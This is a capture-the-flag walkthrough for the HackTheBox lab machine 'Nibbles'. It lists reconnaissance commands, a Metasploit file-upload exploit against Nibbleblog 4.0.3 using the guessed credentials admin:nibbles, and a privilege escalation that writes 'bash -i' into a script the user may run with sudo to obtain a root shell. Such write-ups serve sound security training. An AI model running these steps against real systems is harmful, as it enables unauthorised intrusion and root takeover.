Nibbles
HTB 6. Nibbles
- 1.Port 22 and 80 open from
nmap -A -T4 -p- 10.10.10.75
, typically 80 is for the exploit and 22 is used later. SSH is usually not the exploit. - 2.
searchsploit apache 2.4
- 3.Going to
10.10.10.75
shows "Hello World" only - 4.Viewing source shows
10.10.10.75/nibbleblog/
on nibbleblog platform - 5.
searchsploit nibble
finds Nibbleblog 4.0.3 arbitrary file upload and remote code execution - 6.In metasploit
use exploit/multi/http/nibbleblog_file_upload
andinfo
shows we need to be authenticated - 7.
dirbuster
to find login pages - 8.Could potentially use Burp Suite to brute force usernames and password or just bruteforce password with admin as username. Potentially use
cewl
on blog posts to create password list. - 9.Credentials are
admin:nibbles
, guessed by site name. - 10.Set parameters in metasploit to the username, password, rhosts, and
targeturi=/nibbleblog
. - 11.This works because of the
My Image
plugin that allows any file to be uploaded (no whitelisting is being done) - 12.
sysinfo
shows4.4.0 ubuntu
andgituid
shownibbler (1001)
- 13.Searching for priv_escshellcd /home/nibblerls -lacat user.txthistorycat .bash_historysudo -l
- 14.
sudo -l
reveals~/personal/stuff/monitor.sh
can run as root without a password - 15.This folder does not exist so we can create a shell script in that location.
- 16.
personal.zip
exists, potentially try and crack it - 17.
uname -a
to print entire OS running and potentially search for exploits for the general OS - 18.
- 19.
echo "bash -i" > monitor.sh
andchmod +x monitor.sh
- 20.
sudo /home/nibbler/personal/stuff/monitor.sh
- 21.cat
/root/root.txt
Last modified 9mo ago